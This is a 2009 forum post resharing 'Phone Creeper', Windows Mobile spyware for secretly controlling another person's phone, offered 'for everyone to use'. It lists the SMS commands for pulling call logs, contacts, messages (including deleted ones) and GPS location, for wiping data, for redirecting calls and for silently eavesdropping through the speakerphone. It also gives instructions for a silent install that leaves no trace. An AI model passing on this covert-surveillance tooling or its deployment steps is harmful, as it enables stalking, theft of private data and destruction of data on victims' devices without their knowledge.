| 
		
			| Whosdaman | 07-10-2009 03:15 AM |  
 [7-5-09] Phone Creeper V0.5
 3 Attachment(s) Original Post: http://forum.xda-developers.com/show...34&postcount=1 
What it does is control a phone from another phone. Like Remote Desktop, but between 2 phones...secretly
 
I take no credit in making this, just posting it here for everyone to use
 
(Be forewarned this is illegal in some states...and countries)
 
	Code: 
 *** WHAT IT DOES ***
 This is a phone espionage suite.
 Currently it has the following features:
 
 To receive call history, send the following text to phone with this installed on it:
 chetstriker getcalls
 To add call blocking: (communication either way with specified number will disconnect)
 chetstriker addblk 8005551212
 To add call redirecting: (if phone dials a specific nuumber it will cancel and dial an alternate number instead)
 chetstriker addredir ifthisnumbercalls sendtothisnumber
 To remove call blocks:
 chetstriker delblks
 To remove call redirects:
 chetstriker delredir
 To get contacts: (from memory)
 chetstriker getcontacts
 To get appointments:
 chetstriker getappts
 To get tasks:
 chetstriker gettasks
 To set emergency SMS number:
 chetstriker setemerg 8005551212
 To get phone info: (IMEI, username, email, radio version, etc.)
 chetstriker getinfo
 To get gps location and google maps link:
 chetstriker getpos
 Deletes Contacts, Appointments, Task:
 chetstriker deleteaccts
 Displays command list:
 chetstriker help
 To receive incoming SMS mesages:
 chetstriker getrecsms
 To receive logged SMS mesages: (includes deleted SMS messages, last 10)
 chetstriker getreclog
 To receive sent SMS messages:
 chetstriker getsentsms
 To delete all SMS messages:
 chetstriker delallsms
 To delete received SMS messages:
 chetstriker delrecsms
 To delete sent SMS messages:
 chetstriker delsentsms
 To wipe your storage card:
 chetstriker wipeflash
 To send a fart:
 chetstriker fart
 To send a pop-up message:
 chetstriker message "insert msg here, without quotes"
 To create a silent callback through remote speakerphone:
 chetstriker callback
 To bounce sms off phone to someone else:
 chetstriker bounce sms "phone number to send to" "message to send"
 To send your eaves droping call to someone else:
 chetstriker bounce call "phone number to send to" "message to send"
 To change password:
 chetstriker change "newpassword"
 (Obviously change "newpassword" to be what ever password you want and don't type the quotes.)
 After you have changed your password, make sure you use the new commands accordingly. For example, if I changed the password to yellow and wanted to get call history. I would from now on type:
 yellow getcalls
 
 all results will be sent via SMS back without leaving any trace on the phone being controlled.
 Any cell phone can be used to initiate the commands and all commands will respond with a success message for acknowledgement.
 
 by default the password is "chetstriker", obviously not including the quotes.
 the command structure is (password and then command)
 
 *** HOW TO USE IT ***
 
 -- RemoveCreeper --
 if you have ever installed Phone Creeper, run this to make sure all old files are deleted before installing new version. Just unzip, copy .exe file to PDA and run it from PDA. There is no interface or acknowledgement., it takes about 3 seconds to run.
 
 -- Regular Install with uninstall option --
 Just install .cab on wm5 or higher phone, requires .NET CF 3.5.
 THEN MAKE SURE YOU REBOOT TO INITIATE IT.
 
 -- Silent auto install version --
 Unzip SilentInstaller and copy 2577 folder to root of storage card. After inserting storage card into PDA, it will automaticaly without notice remove old version, install new version and auto start process so reboot is NOT needed. This will also not add entries to startup or remove programs, so the RemoveCreeper file is needed to remove it in the future if you want.
 
 
 << Anti-Creeper Project now started as mentioned earlier >>
 
 If you like this program, please feel free to DONATE
 |